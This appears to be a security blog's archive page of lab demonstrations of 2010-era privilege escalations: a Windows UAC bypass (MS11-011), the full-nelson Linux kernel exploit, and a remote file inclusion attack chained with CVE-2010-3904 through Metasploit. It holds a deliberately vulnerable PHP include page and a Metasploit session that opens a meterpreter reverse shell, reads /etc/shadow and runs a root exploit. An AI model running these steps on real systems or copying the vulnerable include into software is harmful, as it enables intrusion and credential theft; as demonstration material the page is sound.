Tag Archives: Kernel

MS11-011 : Windows UAC Bypass 0day

Timeline :

Vulnerability released by noobpwnftw the 2010-11-24

PoC provided by :

noobpwnftw

Reference(s) :

CVE-2010-4398
EBD-ID-15609
MS11-011

Affected version(s) :

Windows XP SP3
Windows XP Professional x64 SP2
Windows Server 2003 SP2
Windows Server 2003 x64 SP2
Windows Vista SP1 and Windows Vista SP2
Windows Vista x64 SP1 and Windows Vista x64 SP2
Windows Server 2008 32 and Windows Server 2008 32 SP2
Windows Server 2008 x64 and Windows Server 2008 x64 SP2
Windows 7 32
Windows 7 x64
Windows Server 2008 R2 x64

Tested on Windows 7 Integral

Description :

Microsoft Windows does not adequately validate registry data read using the function RtlQueryRegistryValues(). By modifying an EUDC registry key value, a local user could execute arbitrary code with SYSTEM privileges.

Commands :

whoami
poc.exe
whoami

full-nelson.c Linux Kernel local privilege escalation

Timeline :

CVE-2010-3849 reported by Nelson Elhagethe the 2010-10-18
CVE-2010-3850 reported by Nelson Elhagethe the 2010-10-18
CVE-2010-4258 reported by Nelson Elhagethe the 2010-12-02

PoC provided by :

Dan Rosenberg
Nelson Elhage

Reference(s) :

CVE-2010-3849
CVE-2010-3850
CVE-2010-4258

Affected version(s) :

All Linux Kernel versions previous to the 2.6.37 version

Tested on Ubuntu 10.10 server

Description :

This exploit leverages three vulnerabilities to get root, all of which were discovered by Nelson Elhage.

Commands :

uname -a
uid
gcc full-nelson.c -o full-nelson
./full-neslon
uid

Remote File Inclusion and privilege escalation through Metasploit

Demonstration of a RFI (Remote File Inclusion) attack followed by a privilege escalation through Metasploit. The privilege escalation will be done through the CVE-2010-3904 Linux RDS Protocol vulnerability.

Vulnerable web page creation

mkdir 1
vi 1/index.php
<?php
$color='blue';
if(isset($_REQUEST['COLOR'])) {
$color = $_REQUEST['COLOR'];
}
require ($color . '.php');
?>

chown -R apache:apache 1

Vulnerable web page exploitation through Metasploit

use exploit/unix/webapp/php_include
show options
set PATH /1/
set PHPURI /index.php?COLOR=XXpathXX
set RHOST 192.168.178.47
ifconfig
set SRVHOST 192.168.178.21
show options

set PAYLOAD php/meterpreter_reverse_tcp
show options
set LHOST 192.168.178.21
exploit

getuid
getpid
ps
sysinfo
pwd
ls
cat index.php
cat /etc/shadow

lwpd
lcd /home/eromang/exploits/linux/local_escalĀ­ations
upload linux-rds-exploit_CVE-2010-3904

execute -i -f bash
id
chmod u+x linux-rds-exploit_CVE-2010-3904
./linux-rds-exploit_CVE-2010-3904
id
cat /etc/shadow

Video demonstration

CVE-2010-3904: Linux RDS Protocol Local Privilege Escalation

Timeline :

Vulnerability discovered by Dan Rosenberg
Vulnerability disclosed to the vendor the 2010-10-13
Coordinated vulnerability disclosure the 2010-10-19

PoC provided by :

Dan Rosenberg

Reference(s) :

CVE-2010-3904

Affected version(s) :

Kernel Linux 2.6.30 to 2.6.36-rc8

Tested on Ubuntu 10.04

Description :

On October 13th, VSR identified a vulnerability in the RDS protocol, as implemented in the Linux kernel. Because kernel functions responsible for copying data between kernel and user space failed to verify that a user-provided address actually resided in the user segment, a local attacker could issue specially crafted socket function calls to write abritrary values into kernel memory. By leveraging this capability, it is possible for unprivileged users to escalate privileges to root.

Demonstration :